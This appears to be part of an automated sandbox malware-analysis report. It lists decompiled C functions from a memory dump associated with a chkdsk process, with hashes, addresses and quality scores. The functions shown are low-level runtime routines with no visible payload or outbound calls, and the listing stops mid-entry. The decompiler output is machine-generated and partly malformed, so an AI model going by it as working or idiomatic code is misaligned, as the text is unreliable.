                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction ID: b2c780c80c0fee15e92846aa93f40cf47242b6ef7040a0e2264e1d7b4e15ccd4
                                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction Fuzzy Hash: 58E0ED723406016BFB219F4ACC80F43B6A9EF82724F0440BCB9005F282CAE6E80987A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E58CD6 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 36%
                                                      			E04E58CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4e7d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E04DA7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                      0x04e58ce5
                                                      0x04e58ced
                                                      0x04e58cf0
                                                      0x04e58cfb
                                                      0x04e58d0d
                                                      0x04e58cfd
                                                      0x04e58d06
                                                      0x04e58d06
                                                      0x04e58d18
                                                      0x04e58d19
                                                      0x04e58d1b
                                                      0x04e58d20
                                                      0x04e58d33

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3eeb3e603fe4d41362d1df03dcd3d86cb69027fdc9a2c14d0eff8b2697e10bcd
                                                      • Instruction ID: e4e5d681ffa58dd0178eaa0705f26b9d319fdab2cc458d148351f42e996432c4
                                                      • Opcode Fuzzy Hash: 3eeb3e603fe4d41362d1df03dcd3d86cb69027fdc9a2c14d0eff8b2697e10bcd
                                                      • Instruction Fuzzy Hash: E8F08970A04109EBDB04EBA9D945E6E77B8EF04304F100199E915EB290E934E910C754
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DA746D Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E04DA746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E04D9EB70(__ecx, 0x4e779a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E04DC95D0();
							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                      0x04da746d
                                                      0x04da746d
                                                      0x04da746d
                                                      0x04da7471
                                                      0x04da7488
                                                      0x04def92d
                                                      0x04da748e
                                                      0x04da7491
                                                      0x04da7495
                                                      0x04def937
                                                      0x04def93a
                                                      0x04def94e
                                                      0x04def953
                                                      0x04def956
                                                      0x04def956
                                                      0x04da7495
                                                      0x00000000
                                                      0x04da7488
                                                      0x04da7473
                                                      0x04da7478
                                                      0x04da747d
                                                      0x04da7481
                                                      0x00000000
                                                      0x04da7481
                                                      0x04da747d
                                                      0x04da747a
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 374ab5a2512981516a9de3a53e476940aa137a098c95cb7fda088b069165e906
                                                      • Instruction ID: f48e307fb67df48bc0b9d7cd6935928cff732ad592937cbaddb7656502e46bbb
                                                      • Opcode Fuzzy Hash: 374ab5a2512981516a9de3a53e476940aa137a098c95cb7fda088b069165e906
                                                      • Instruction Fuzzy Hash: F5F0BE34B01244EAEF01EB68C840B7ABBA1BF04318F040259D8D1AB160F7A5F820CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D84F2E Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D84F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E04E588F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E04DAC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4d61030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                      0x04d84f2e
                                                      0x04d84f34
                                                      0x04d84f38
                                                      0x04de0b85
                                                      0x04de0b85
                                                      0x04de0b89
                                                      0x04de0b9a
                                                      0x04de0b9a
                                                      0x04de0b9f
                                                      0x00000000
                                                      0x04de0b9f
                                                      0x04de0b94
                                                      0x04de0b98
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04de0b98
                                                      0x04d84f3e
                                                      0x04d84f48
                                                      0x00000000
                                                      0x04d84f6e
                                                      0x00000000
                                                      0x04d84f70

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a340ab952355ca0ae18d99f7cdf9d963d6f344dc7878ab1e61b6d10c6aa896c8
                                                      • Instruction ID: e2477b44d1a863af928c25b74b608efeab6f2aa14908db7ca28051da21406b96
                                                      • Opcode Fuzzy Hash: a340ab952355ca0ae18d99f7cdf9d963d6f344dc7878ab1e61b6d10c6aa896c8
                                                      • Instruction Fuzzy Hash: 40F0E2326256A48FE772EB19C184B33B7E4FB007B8F445465D40587A21D7B4FC44C660
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E58B58 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 36%
                                                      			E04E58B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x4e7d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E04DA7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E04DCB640(E04DC9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                      0x04e58b67
                                                      0x04e58b6f
                                                      0x04e58b72
                                                      0x04e58b7d
                                                      0x04e58b8f
                                                      0x04e58b7f
                                                      0x04e58b88
                                                      0x04e58b88
                                                      0x04e58b9a
                                                      0x04e58b9b
                                                      0x04e58b9d
                                                      0x04e58ba2
                                                      0x04e58bb5

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67db3351d29ff4257de8b4f21307f59fe144f5630ef7750b880c04b0249aa2c7
                                                      • Instruction ID: 7db24a124df38760b7586e4aca32d245be22ff4a7ca7325d879dd6b8e3c800ad
                                                      • Opcode Fuzzy Hash: 67db3351d29ff4257de8b4f21307f59fe144f5630ef7750b880c04b0249aa2c7
                                                      • Instruction Fuzzy Hash: 76F082B0B04259ABEB00EBA9D906E7E73B8FF04304F040499B905EB391EA74E910C7A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBA44B Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DBA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x4e77b9c; // 0x0
				_t15 = __ecx;
				_t16 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E04DCFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                      0x04dba44b
                                                      0x04dba453
                                                      0x04dba472
                                                      0x04dba476
                                                      0x00000000
                                                      0x04dba493
                                                      0x04dba47a
                                                      0x04dba47f
                                                      0x04dba486
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9c6d9483924af2981d5b30cf0d0061bc2d1384312b0a9aec3c8bd1f48ff787e4
                                                      • Instruction ID: ccf68bc4dd81aa7ddb51eb2714d7203aaa0603d033251d5adca865a939d1cd02
                                                      • Opcode Fuzzy Hash: 9c6d9483924af2981d5b30cf0d0061bc2d1384312b0a9aec3c8bd1f48ff787e4
                                                      • Instruction Fuzzy Hash: 81E09272B01421ABD2119B59AC00FA6B39EEBD4655F094039E549C7254D668ED11CBE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D8F358 Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E04D8F358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E04DBF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L04DA4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                      0x04d8f35d
                                                      0x04d8f361
                                                      0x04d8f367
                                                      0x04d8f372
                                                      0x04d8f38c
                                                      0x04d8f38c
                                                      0x04d8f394

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction ID: d4941975daf4aa6dbc3e481d9e4de4e7af6d8e3f6f333b09a61eb8eabd54c1d1
                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction Fuzzy Hash: EAE0D832A40218FBDF31A7DA9D05FAABBACDB44B60F040159F904D7150D561AD00C6D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D9FF60 Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D9FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4d611a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E04E588F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E04DA0050(_t14);
				}
			}










                                                      0x04d9ff66
                                                      0x04d9ff6b
                                                      0x00000000
                                                      0x04d9ff8f
                                                      0x00000000
                                                      0x04d9ff8f

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a11e05cc92dcde5df1fbf9483a1546f6278fa468887870734999f2bfbea4868d
                                                      • Instruction ID: f8555d34272202649c2246a3f7217d5df373ad2d5a4e2891d389955b36173110
                                                      • Opcode Fuzzy Hash: a11e05cc92dcde5df1fbf9483a1546f6278fa468887870734999f2bfbea4868d
                                                      • Instruction Fuzzy Hash: 76E09AB02052049FEB35DF51D080F2937E8AB42625F19801EE408CB201C621FCC8C61A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E141E8 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E04E141E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x4e608f0);
				_t5 = E04DDD08C(__ebx, __edi, __esi);
				if( *0x4e787ec == 0) {
					E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x4e787ec == 0) {
						 *0x4e787f0 = 0x4e787ec;
						 *0x4e787ec = 0x4e787ec;
						 *0x4e787e8 = 0x4e787e4;
						 *0x4e787e4 = 0x4e787e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04E14248();
				}
				return E04DDD0D1(_t5);
			}





                                                      0x04e141e8
                                                      0x04e141ea
                                                      0x04e141ef
                                                      0x04e141fb
                                                      0x04e14206
                                                      0x04e1420b
                                                      0x04e14216
                                                      0x04e1421d
                                                      0x04e14222
                                                      0x04e1422c
                                                      0x04e14231
                                                      0x04e14231
                                                      0x04e14236
                                                      0x04e1423d
                                                      0x04e1423d
                                                      0x04e14247

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d4b1d2a9db98eecf54a213c704d442086364295b4c35d6ae53bde38a8766c5a
                                                      • Instruction ID: 49745eac6a163366bf04aabd4952ac74b40db859fc08660f05d3bbf918387a51
                                                      • Opcode Fuzzy Hash: 4d4b1d2a9db98eecf54a213c704d442086364295b4c35d6ae53bde38a8766c5a
                                                      • Instruction Fuzzy Hash: 0AF01574A90706CFEBA0FFABE50971437A4FBA433AF10621AD006C7298C7786881CF11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E3D380 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04E3D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L04D8E8B0(__ecx, _a4, 0xfff);
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                      0x04e3d38a
                                                      0x04e3d39b
                                                      0x04e3d3b1
                                                      0x00000000
                                                      0x04e3d3b6
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction ID: c2200718d608a05cb693b938c3e07ea700590c48248678136da57a993a9ebc0e
                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction Fuzzy Hash: 49E0C231381208BBEB226E44CC00FB97B26DB807A5F104031FE08AA690C675FCA1EAD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DBA185 Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DBA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x4e767e4 >= 0xa) {
					if(_t5 < 0x4e76800 || _t5 >= 0x4e76900) {
						return L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E04DA0010(0x4e767e0, _t5);
				}
			}





                                                      0x04dba190
                                                      0x04dba1a6
                                                      0x04dba1c2
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04dba192
                                                      0x04dba192
                                                      0x04dba19f
                                                      0x04dba19f

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7c332bbec8aec11d3a417c5888613e3f9f0b60a263232b45c99d124a737a571
                                                      • Instruction ID: a4084b6dccd1940be5e428808280f5f4a06661d23f3425e433452ddaf1cbfff8
                                                      • Opcode Fuzzy Hash: d7c332bbec8aec11d3a417c5888613e3f9f0b60a263232b45c99d124a737a571
                                                      • Instruction Fuzzy Hash: A6D02B31261400A7FA1D9B30B855B2123D6EB807BCF300C0DF1430A794D954FCE4C198
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB16E0 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DB16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04DB1710(0x4e767e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04DA4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                      0x04db16e8
                                                      0x04db16ef
                                                      0x04db16f3
                                                      0x04db16fe
                                                      0x00000000
                                                      0x04db1700
                                                      0x04db170d
                                                      0x04db170d
                                                      0x04db16f2
                                                      0x04db16f2
                                                      0x04db16f2
                                                      0x04db16f2

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4ea1792abf98494e5d3d1abcda2b94a2103382c33b3cd0f63bdb1f326ce1a4e1
                                                      • Instruction ID: e5447ef436e3ba89ed8f5bb6896384fea1c61b188d1b865f567f4ea380afc068
                                                      • Opcode Fuzzy Hash: 4ea1792abf98494e5d3d1abcda2b94a2103382c33b3cd0f63bdb1f326ce1a4e1
                                                      • Instruction Fuzzy Hash: F6D0A731200100D2FA2D5B109825B982351EB807D9F3C005CF107594C0CFA0FDA2E498
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E053CA Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04E053CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04D9EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                      0x04e053ca
                                                      0x04e053ce
                                                      0x04e053d9
                                                      0x04e053de
                                                      0x04e053e1
                                                      0x04e053e1
                                                      0x04e053e6
                                                      0x04e053f3
                                                      0x00000000
                                                      0x04e053f8
                                                      0x04e053fb

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction ID: b3d5be3e6f0d1f39d57f4123bede4482d46f5f1ed3d2ecddb19f46587d5d002f
                                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction Fuzzy Hash: 4EE08C31A00680ABCF12EB48C650F6EB7F5FB44B04F140004A0086B6A0C628FC00CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04DB35A1 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04DB35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04D9EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                      0x04db35a1
                                                      0x04db35a1
                                                      0x04db35a5
                                                      0x04db35ab
                                                      0x04db35ab
                                                      0x04db35b5
                                                      0x00000000
                                                      0x04db35c1
                                                      0x04db35b7

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction ID: 52b408f83c9bca8b37695b708d3dbacba1e6f072ae9f85dc9650850c48be2f50
                                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction Fuzzy Hash: DBD0A931601180DAEF01EF10C21C7E833F2FB00308F58A06588C706892E33AEA0AF680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D9AAB0 Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E04D9AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                      0x04d9aab6
                                                      0x04d9aabb
                                                      0x04dea442
                                                      0x00000000
                                                      0x04dea448
                                                      0x04dea454
                                                      0x04dea454
                                                      0x04d9aac1
                                                      0x04d9aac1
                                                      0x04d9aac6
                                                      0x04d9aac6

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
